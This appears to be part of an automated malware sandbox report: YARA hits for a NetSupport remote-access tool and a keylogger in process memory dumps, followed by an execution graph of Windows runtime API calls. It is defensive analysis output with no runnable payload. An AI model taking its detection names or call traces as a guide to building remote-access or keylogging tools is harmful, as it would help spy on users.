                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2944484464.000000000A642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3124698930.000000000A720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951937785.000000000A660000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2944931640.000000000A6BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951583851.000000000A71A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2935540782.000000000A642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2616773901.0000000007AEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943414129.000000000A6BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:22.6%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:1.4%
                                                                                                    Total number of Nodes:487
                                                                                                    Total number of Limit Nodes:9
                                                                                                    execution_graph 2041 16c171c 2042 16c1728 ___free_lconv_mon 2041->2042 2047 16d4737 EnterCriticalSection 2042->2047 2044 16c1737 ___free_lconv_mon 2048 16c179b 2044->2048 2047->2044 2051 16d477f LeaveCriticalSection 2048->2051 2050 16c178d 2051->2050 2052 16adbca 2055 16aee19 2052->2055 2054 16adbcf 2054->2054 2056 16aee2f 2055->2056 2058 16aee38 2056->2058 2059 16aedcc GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2056->2059 2058->2054 2059->2058 1447 16c212f 1448 16c2141 1447->1448 1453 16c2166 1448->1453 1450 16c2159 1464 16ba6db 1450->1464 1454 16c2176 1453->1454 1455 16c217d 1453->1455 1470 16ba84b GetLastError 1454->1470 1461 16c218b 1455->1461 1474 16c1fbe 1455->1474 1458 16c21b2 1458->1461 1477 16c2210 IsProcessorFeaturePresent 1458->1477 1460 16c21e2 1481 16c212f 1460->1481 1461->1450 1465 16ba6e7 1464->1465 1466 16ba6fe 1465->1466 1748 16ba891 1465->1748 1468 16ba711 1466->1468 1469 16ba891 42 API calls 1466->1469 1469->1468 1471 16ba864 1470->1471 1487 16dbe75 1471->1487 1475 16c1fc9 GetLastError SetLastError 1474->1475 1476 16c1fe2 1474->1476 1475->1458 1476->1458 1478 16c221c 1477->1478 1734 16c1fe7 1478->1734 1482 16c2141 1481->1482 1483 16c2166 42 API calls 1482->1483 1484 16c2159 1483->1484 1485 16ba6db 42 API calls 1484->1485 1486 16c2164 1485->1486 1486->1450 1488 16dbe88 1487->1488 1489 16dbe8e 1487->1489 1509 16dcc64 1488->1509 1493 16ba87c SetLastError 1489->1493 1514 16dcca3 1489->1514 1493->1455 1496 16dbed5 1499 16dcca3 ___free_lconv_mon 6 API calls 1496->1499 1497 16dbec0 1498 16dcca3 ___free_lconv_mon 6 API calls 1497->1498 1500 16dbecc 1498->1500 1501 16dbee1 1499->1501 1526 16dc54e 1500->1526 1502 16dbee5 1501->1502 1503 16dbef4 1501->1503 1505 16dcca3 ___free_lconv_mon 6 API calls 1502->1505 1532 16dbaa1 1503->1532 1505->1500 1508 16dc54e ___free_lconv_mon 14 API calls 1508->1493 1537 16dca11 1509->1537 1512 16dcc9b TlsGetValue 1513 16dcc89 1513->1489 1515 16dca11 ___free_lconv_mon 5 API calls 1514->1515 1516 16dccbf 1515->1516 1517 16dccdd TlsSetValue 1516->1517 1518 16dbea8 1516->1518 1518->1493 1519 16dc150 1518->1519 1523 16dc15d ___free_lconv_mon 1519->1523 1520 16dc19d 1555 16cb4a1 1520->1555 1521 16dc188 RtlAllocateHeap 1522 16dbeb8 1521->1522 1521->1523 1522->1496 1522->1497 1523->1520 1523->1521 1552 16d64d7 1523->1552 1527 16dc559 RtlFreeHeap 1526->1527 1528 16dc583 1526->1528 1527->1528 1529 16dc56e GetLastError 1527->1529 1528->1493 1530 16dc57b ___free_lconv_mon 1529->1530 1531 16cb4a1 ___free_lconv_mon 12 API calls 1530->1531 1531->1528 1592 16db935 1532->1592 1538 16dca3d 1537->1538 1539 16dca41 1537->1539 1538->1512 1538->1513 1539->1538 1544 16dc946 1539->1544 1542 16dca5b GetProcAddress 1542->1538 1543 16dca6b ___free_lconv_mon 1542->1543 1543->1538 1550 16dc957 ___free_lconv_mon 1544->1550 1545 16dc9ed 1545->1538 1545->1542 1546 16dc975 LoadLibraryExW 1547 16dc9f4 1546->1547 1548 16dc990 GetLastError 1546->1548 1547->1545 1549 16dca06 FreeLibrary 1547->1549 1548->1550 1549->1545 1550->1545 1550->1546 1551 16dc9c3 LoadLibraryExW 1550->1551 1551->1547 1551->1550 1558 16d6503 1552->1558 1569 16dbdc4 GetLastError 1555->1569 1557 16cb4a6 1557->1522 1559 16d650f ___free_lconv_mon 1558->1559 1564 16d4737 EnterCriticalSection 1559->1564 1561 16d651a ___free_lconv_mon 1565 16d6551 1561->1565 1564->1561 1568 16d477f LeaveCriticalSection 1565->1568 1567 16d64e2 1567->1523 1568->1567 1570 16dbdda 1569->1570 1571 16dbde0 1569->1571 1572 16dcc64 ___free_lconv_mon 6 API calls 1570->1572 1573 16dcca3 ___free_lconv_mon 6 API calls 1571->1573 1575 16dbde4 SetLastError 1571->1575 1572->1571 1574 16dbdfc 1573->1574 1574->1575 1577 16dc150 ___free_lconv_mon 12 API calls 1574->1577 1575->1557 1578 16dbe11 1577->1578 1579 16dbe19 1578->1579 1580 16dbe2a 1578->1580 1581 16dcca3 ___free_lconv_mon 6 API calls 1579->1581 1582 16dcca3 ___free_lconv_mon 6 API calls 1580->1582 1590 16dbe27 1581->1590 1583 16dbe36 1582->1583 1584 16dbe3a 1583->1584 1585 16dbe51 1583->1585 1587 16dcca3 ___free_lconv_mon 6 API calls 1584->1587 1586 16dbaa1 ___free_lconv_mon 12 API calls 1585->1586 1589 16dbe5c 1586->1589 1587->1590 1588 16dc54e ___free_lconv_mon 12 API calls 1588->1575 1591 16dc54e ___free_lconv_mon 12 API calls 1589->1591 1590->1588 1591->1575 1593 16db941 ___free_lconv_mon 1592->1593 1606 16d4737 EnterCriticalSection 1593->1606 1595 16db94b 1607 16db97b 1595->1607 1598 16dba47 1599 16dba53 ___free_lconv_mon 1598->1599 1611 16d4737 EnterCriticalSection 1599->1611 1601 16dba5d 1612 16dbc28 1601->1612 1603 16dba75 1616 16dba95 1603->1616 1606->1595 1610 16d477f LeaveCriticalSection 1607->1610 1609 16db969 1609->1598 1610->1609 1611->1601 1613 16dbc37 ___free_lconv_mon 1612->1613 1615 16dbc5e ___free_lconv_mon 1612->1615 1613->1615 1619 16e4f50 1613->1619 1615->1603 1733 16d477f LeaveCriticalSection 1616->1733 1618 16dba83 1618->1508 1621 16e4fd0 1619->1621 1622 16e4f66 1619->1622 1623 16dc54e ___free_lconv_mon 14 API calls 1621->1623 1645 16e501e 1621->1645 1622->1621 1627 16dc54e ___free_lconv_mon 14 API calls 1622->1627 1628 16e4f99 1622->1628 1624 16e4ff2 1623->1624 1625 16dc54e ___free_lconv_mon 14 API calls 1624->1625 1629 16e5005 1625->1629 1626 16dc54e ___free_lconv_mon 14 API calls 1630 16e4fc5 1626->1630 1632 16e4f8e 1627->1632 1633 16dc54e ___free_lconv_mon 14 API calls 1628->1633 1644 16e4fbb 1628->1644 1634 16dc54e ___free_lconv_mon 14 API calls 1629->1634 1635 16dc54e ___free_lconv_mon 14 API calls 1630->1635 1631 16e508c 1636 16dc54e ___free_lconv_mon 14 API calls 1631->1636 1647 16e42a2 1632->1647 1638 16e4fb0 1633->1638 1639 16e5013 1634->1639 1635->1621 1641 16e5092 1636->1641 1675 16e4701 1638->1675 1643 16dc54e ___free_lconv_mon 14 API calls 1639->1643 1640 16dc54e 14 API calls ___free_lconv_mon 1646 16e502c 1640->1646 1641->1615 1643->1645 1644->1626 1687 16e50c1 1645->1687 1646->1631 1646->1640 1648 16e439c 1647->1648 1649 16e42b3 1647->1649 1648->1628 1650 16e42c4 1649->1650 1651 16dc54e ___free_lconv_mon 14 API calls 1649->1651 1652 16e42d6 1650->1652 1653 16dc54e ___free_lconv_mon 14 API calls 1650->1653 1651->1650 1654 16e42e8 1652->1654 1656 16dc54e ___free_lconv_mon 14 API calls 1652->1656 1653->1652 1655 16e42fa 1654->1655 1657 16dc54e ___free_lconv_mon 14 API calls 1654->1657 1658 16e430c 1655->1658 1659 16dc54e ___free_lconv_mon 14 API calls 1655->1659 1656->1654 1657->1655 1660 16e431e 1658->1660 1661 16dc54e ___free_lconv_mon 14 API calls 1658->1661 1659->1658 1662 16e4330 1660->1662 1664 16dc54e ___free_lconv_mon 14 API calls 1660->1664 1661->1660 1663 16e4342 1662->1663 1665 16dc54e ___free_lconv_mon 14 API calls 1662->1665 1666 16e4354 1663->1666 1667 16dc54e ___free_lconv_mon 14 API calls 1663->1667 1664->1662 1665->1663 1668 16e4366 1666->1668 1669 16dc54e ___free_lconv_mon 14 API calls 1666->1669 1667->1666 1670 16e4378 1668->1670 1672 16dc54e ___free_lconv_mon 14 API calls 1668->1672 1669->1668 1671 16e438a 1670->1671 1673 16dc54e ___free_lconv_mon 14 API calls 1670->1673 1671->1648 1674 16dc54e ___free_lconv_mon 14 API calls 1671->1674 1672->1670 1673->1671 1674->1648 1676 16e470e 1675->1676 1677 16e4766 1675->1677 1678 16e471e 1676->1678 1679 16dc54e ___free_lconv_mon 14 API calls 1676->1679 1677->1644 1680 16e4730 1678->1680 1681 16dc54e ___free_lconv_mon 14 API calls 1678->1681 1679->1678 1682 16e4742 1680->1682 1684 16dc54e ___free_lconv_mon 14 API calls 1680->1684 1681->1680 1683 16e4754 1682->1683 1685 16dc54e ___free_lconv_mon 14 API calls 1682->1685 1683->1677 1686 16dc54e ___free_lconv_mon 14 API calls 1683->1686 1684->1682 1685->1683 1686->1677 1688 16e50ce 1687->1688 1692 16e50ed 1687->1692 1688->1692 1693 16e4c28 1688->1693 1691 16dc54e ___free_lconv_mon 14 API calls 1691->1692 1692->1646 1694 16e4d06 1693->1694 1695 16e4c39 1693->1695 1694->1691 1729 16e4987 1695->1729 1698 16e4987 ___free_lconv_mon 14 API calls 1699 16e4c4c 1698->1699 1700 16e4987 ___free_lconv_mon 14 API calls 1699->1700 1701 16e4c57 1700->1701 1702 16e4987 ___free_lconv_mon 14 API calls 1701->1702 1703 16e4c62 1702->1703 1704 16e4987 ___free_lconv_mon 14 API calls 1703->1704 1705 16e4c70 1704->1705 1706 16dc54e ___free_lconv_mon 14 API calls 1705->1706 1707 16e4c7b 1706->1707 1708 16dc54e ___free_lconv_mon 14 API calls 1707->1708 1709 16e4c86 1708->1709 1710 16dc54e ___free_lconv_mon 14 API calls 1709->1710 1711 16e4c91 1710->1711 1712 16e4987 ___free_lconv_mon 14 API calls 1711->1712 1713 16e4c9f 1712->1713 1714 16e4987 ___free_lconv_mon 14 API calls 1713->1714 1715 16e4cad 1714->1715 1716 16e4987 ___free_lconv_mon 14 API calls 1715->1716 1717 16e4cbe 1716->1717 1718 16e4987 ___free_lconv_mon 14 API calls 1717->1718 1719 16e4ccc 1718->1719 1720 16e4987 ___free_lconv_mon 14 API calls 1719->1720 1721 16e4cda 1720->1721 1722 16dc54e ___free_lconv_mon 14 API calls 1721->1722 1723 16e4ce5 1722->1723 1724 16dc54e ___free_lconv_mon 14 API calls 1723->1724 1725 16e4cf0 1724->1725 1726 16dc54e ___free_lconv_mon 14 API calls 1725->1726 1727 16e4cfb 1726->1727 1728 16dc54e ___free_lconv_mon 14 API calls 1727->1728 1728->1694 1731 16e4999 1729->1731 1730 16e49a8 1730->1698 1731->1730 1732 16dc54e ___free_lconv_mon 14 API calls 1731->1732 1732->1731 1733->1618 1735 16c2003 1734->1735 1736 16c202f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1735->1736 1737 16c2100 1736->1737 1740 16ad364 1737->1740 1739 16c211e GetCurrentProcess TerminateProcess 1739->1460 1741 16ad36c 1740->1741 1742 16ad36d IsProcessorFeaturePresent 1740->1742 1741->1739 1744 16ae79c 1742->1744 1747 16ae75f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1744->1747 1746 16ae87f 1746->1739 1747->1746 1749 16ba89b 1748->1749 1750 16ba8a4 1748->1750 1751 16ba84b 16 API calls 1749->1751 1750->1466 1752 16ba8a0 1751->1752 1752->1750 1755 16cb23d 1752->1755 1754 16ba8ad 1754->1466 1766 16c1866 1755->1766 1758 16cb24d 1759 16cb276 1758->1759 1760 16cb257 IsProcessorFeaturePresent 1758->1760 1812 16ba563 1759->1812 1762 16cb263 1760->1762 1764 16c1fe7 8 API calls 1762->1764 1764->1759 1765 16cb280 1765->1754 1815 16c16b4 1766->1815 1769 16c18ab 1773 16c18b7 ___free_lconv_mon 1769->1773 1770 16dbdc4 ___free_lconv_mon 14 API calls 1779 16c18e8 1770->1779 1771 16c1907 1772 16cb4a1 ___free_lconv_mon 14 API calls 1771->1772 1775 16c190c 1772->1775 1773->1770 1773->1771 1774 16c1919 1773->1774 1773->1779 1776 16c194f ___free_lconv_mon 1774->1776 1836 16d4737 EnterCriticalSection 1774->1836 1833 16c21e3 1775->1833 1781 16c198c 1776->1781 1782 16c1a89 1776->1782 1792 16c19ba 1776->1792 1779->1771 1779->1774 1800 16c18f1 1779->1800 1781->1792 1837 16dbc73 GetLastError 1781->1837 1784 16c1a94 1782->1784 1891 16d477f LeaveCriticalSection 1782->1891 1785 16ba563 21 API calls 1784->1785 1791 16c1a9c ___free_lconv_mon 1785->1791 1788 16dbc73 40 API calls 1793 16c1a0f 1788->1793 1789 16c19af 1790 16dbc73 40 API calls 1789->1790 1790->1792 1794 16c1ac5 1791->1794 1795 16c1ad3 1791->1795 1887 16c1a35 1792->1887 1798 16dbc73 40 API calls 1793->1798 1793->1800 1892 16c1834 1794->1892 1797 16c1b9d 1795->1797 1801 16c1b03 1795->1801 1896 16d4737 EnterCriticalSection 1797->1896 1798->1800 1800->1758 1803 16dbdc4 ___free_lconv_mon 14 API calls 1801->1803 1806 16c1acd 1801->1806 1802 16c1baa 1804 16c1bcc SetConsoleCtrlHandler 1802->1804 1809 16c1bdd ___free_lconv_mon 1802->1809 1807 16c1b1b 1803->1807 1805 16c1be6 GetLastError 1804->1805 1804->1809 1897 16cb48e 1805->1897 1806->1758 1807->1806 1826 16dd11e 1807->1826 1900 16c1c45 1809->1900 1905 16ba3d3 1812->1905 1816 16c16c0 ___free_lconv_mon 1815->1816 1821 16d4737 EnterCriticalSection 1816->1821 1818 16c16ce 1822 16c1710 1818->1822 1821->1818 1825 16d477f LeaveCriticalSection 1822->1825 1824 16c16f9 1824->1758 1824->1769 1825->1824 1827 16dd15c 1826->1827 1831 16dd12c ___free_lconv_mon 1826->1831 1828 16cb4a1 ___free_lconv_mon 14 API calls 1827->1828 1830 16dd15a 1828->1830 1829 16dd147 RtlAllocateHeap 1829->1830 1829->1831 1830->1806 1831->1827 1831->1829 1832 16d64d7 ___free_lconv_mon 2 API calls 1831->1832 1832->1831 1834 16c212f 42 API calls 1833->1834 1835 16c21ef 1834->1835 1835->1800 1836->1776 1838 16dbc89 1837->1838 1839 16dbc8f 1837->1839 1840 16dcc64 ___free_lconv_mon 6 API calls 1838->1840 1841 16dcca3 ___free_lconv_mon 6 API calls 1839->1841 1865 16dbc93 SetLastError 1839->1865 1840->1839 1842 16dbcab 1841->1842 1844 16dc150 ___free_lconv_mon 14 API calls 1842->1844 1842->1865 1845 16dbcc0 1844->1845 1848 16dbcd9 1845->1848 1849 16dbcc8 1845->1849 1846 16dbd28 1850 16cb23d 40 API calls 1846->1850 1847 16dbd23 1847->1789 1852 16dcca3 ___free_lconv_mon 6 API calls 1848->1852 1851 16dcca3 ___free_lconv_mon 6 API calls 1849->1851 1853 16dbd2d 1850->1853 1854 16dbcd6 1851->1854 1855 16dbce5 1852->1855 1856 16dbd3f 1853->1856 1860 16dcc64 ___free_lconv_mon 6 API calls 1853->1860 1864 16dc54e ___free_lconv_mon 14 API calls 1854->1864 1858 16dbce9 1855->1858 1859 16dbd00 1855->1859 1857 16dcca3 ___free_lconv_mon 6 API calls 1856->1857 1884 16dbd45 1856->1884 1862 16dbd59 1857->1862 1863 16dcca3 ___free_lconv_mon 6 API calls 1858->1863 1861 16dbaa1 ___free_lconv_mon 14 API calls 1859->1861 1860->1856 1866 16dbd0b 1861->1866 1868 16dc150 ___free_lconv_mon 14 API calls 1862->1868 1862->1884 1863->1854 1864->1865 1865->1846 1865->1847 1867 16dc54e ___free_lconv_mon 14 API calls 1866->1867 1867->1865 1870 16dbd69 1868->1870 1869 16cb23d 40 API calls 1871 16dbdc3 1869->1871 1872 16dbd86 1870->1872 1873 16dbd71 1870->1873 1875 16dcca3 ___free_lconv_mon 6 API calls 1872->1875 1874 16dcca3 ___free_lconv_mon 6 API calls 1873->1874 1879 16dbd7d 1874->1879 1876 16dbd92 1875->1876 1877 16dbda5 1876->1877 1878 16dbd96 1876->1878 1881 16dbaa1 ___free_lconv_mon 14 API calls 1877->1881 1880 16dcca3 ___free_lconv_mon 6 API calls 1878->1880 1882 16dc54e ___free_lconv_mon 14 API calls 1879->1882 1880->1879 1883 16dbdb0 1881->1883 1882->1884 1885 16dc54e ___free_lconv_mon 14 API calls 1883->1885 1884->1869 1886 16dbd4a 1884->1886 1885->1886 1886->1789 1888 16c1a39 1887->1888 1890 16c1a01 1887->1890 1903 16d477f LeaveCriticalSection 1888->1903 1890->1788 1890->1793 1890->1800 1891->1784 1893 16c185b 1892->1893 1894 16c1841 1892->1894 1893->1806 1894->1893 1895 16cb4a1 ___free_lconv_mon 14 API calls 1894->1895 1895->1893 1896->1802 1898 16dbdc4 ___free_lconv_mon 14 API calls 1897->1898 1899 16cb493 1898->1899 1899->1809 1904 16d477f LeaveCriticalSection 1900->1904 1902 16c1c4c 1902->1806 1903->1890 1904->1902 1906 16ba412 1905->1906 1907 16ba400 1905->1907 1917 16ba264 1906->1917 1932 16aed20 GetModuleHandleW 1907->1932 1910 16ba44f 1910->1765 1915 16ba464 1918 16ba270 ___free_lconv_mon 1917->1918 1940 16d4737 EnterCriticalSection 1918->1940 1920 16ba27a 1941 16ba2eb 1920->1941 1922 16ba287 1945 16ba2a5 1922->1945 1925 16ba46a 1969 16ba49b 1925->1969 1927 16ba474 1928 16ba488 1927->1928 1929 16ba478 GetCurrentProcess TerminateProcess 1927->1929 1930 16ba4b4 3 API calls 1928->1930 1929->1928 1931 16ba490 ExitProcess 1930->1931 1933 16aed2c 1932->1933 1933->1906 1934 16ba4b4 GetModuleHandleExW 1933->1934 1935 16ba4f3 GetProcAddress 1934->1935 1936 16ba514 1934->1936 1935->1936 1937 16ba507 1935->1937 1938 16ba51a FreeLibrary 1936->1938 1939 16ba411 1936->1939 1937->1936 1938->1939 1939->1906 1940->1920 1942 16ba2f7 ___free_lconv_mon 1941->1942 1943 16ba35b 1942->1943 1948 16d7123 1942->1948 1943->1922 1968 16d477f LeaveCriticalSection 1945->1968 1947 16ba293 1947->1910 1947->1925 1949 16d712f __EH_prolog3 1948->1949 1952 16d6e7b 1949->1952 1951 16d7156 1951->1943 1953 16d6e87 ___free_lconv_mon 1952->1953 1960 16d4737 EnterCriticalSection 1953->1960 1955 16d6e95 1961 16d7033 1955->1961 1960->1955 1962 16d7052 1961->1962 1963 16d6ea2 1961->1963 1962->1963 1964 16dc54e ___free_lconv_mon 14 API calls 1962->1964 1965 16d6eca 1963->1965 1964->1963 1966 16d477f ___free_lconv_mon LeaveCriticalSection 1965->1966 1967 16d6eb3 1966->1967 1967->1951 1968->1947 1972 16daf86 1969->1972 1971 16ba4a0 1971->1927 1973 16daf95 1972->1973 1974 16dafa2 1973->1974 1976 16dca96 1973->1976 1974->1971 1977 16dca11 ___free_lconv_mon 5 API calls 1976->1977 1978 16dcab2 1977->1978 1978->1974 1979 16bb218 1980 16bb224 ___free_lconv_mon 1979->1980 1981 16bb22b GetLastError ExitThread 1980->1981 1982 16bb238 1980->1982 1983 16dbc73 42 API calls 1982->1983 1984 16bb23d 1983->1984 1993 16daf4c 1984->1993 1987 16bb254 1997 16bb3f7 1987->1997 1994 16bb248 1993->1994 1995 16daf5c 1993->1995 1994->1987 2000 16dcfcd 1994->2000 1995->1994 2006 16dcad6 1995->2006 2009 16bb2cd 1997->2009 2001 16dca11 ___free_lconv_mon 5 API calls 2000->2001 2002 16dcfe9 2001->2002 2002->1987 2007 16dca11 ___free_lconv_mon 5 API calls 2006->2007 2008 16dcaf2 2007->2008 2008->1994 2010 16dbdc4 ___free_lconv_mon 14 API calls 2009->2010 2012 16bb2d8 2010->2012 2011 16bb31a ExitThread 2012->2011 2013 16bb2f1 2012->2013 2018 16dd008 2012->2018 2015 16bb304 2013->2015 2016 16bb2fd CloseHandle 2013->2016 2015->2011 2017 16bb310 FreeLibraryAndExitThread 2015->2017 2016->2015 2017->2011 2019 16dca11 ___free_lconv_mon 5 API calls 2018->2019 2020 16dd021 2019->2020 2020->2013 2060 1732a40 2061 16ad364 _ValidateLocalCookies 5 API calls 2060->2061 2062 1732a53 2061->2062 2021 16af310 2022 16af32e 2021->2022 2037 16af2d0 2022->2037 2024 16af3dd 2025 16af34c ___except_validate_context_record 2025->2024 2026 16af3ae 2025->2026 2028 16af3ea __IsNonwritableInCurrentImage 2025->2028 2026->2024 2027 16af2d0 _ValidateLocalCookies 5 API calls 2026->2027 2027->2024 2029 16b3590 RtlUnwind 2028->2029 2030 16af437 2029->2030 2031 16af2d0 _ValidateLocalCookies 5 API calls 2030->2031 2032 16af45d 2031->2032 2033 16af4be 2032->2033 2034 16af4a8 2032->2034 2036 16d066f 42 API calls 2032->2036 2035 16c10e9 14 API calls 2034->2035 2035->2033 2036->2034 2038 16af2ef 2037->2038 2039 16af2e2 2037->2039 2040 16ad364 _ValidateLocalCookies 5 API calls 2039->2040 2040->2038

                                                                                                    Callgraph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Opacity -> Relevance
                                                                                                    • Disassembly available
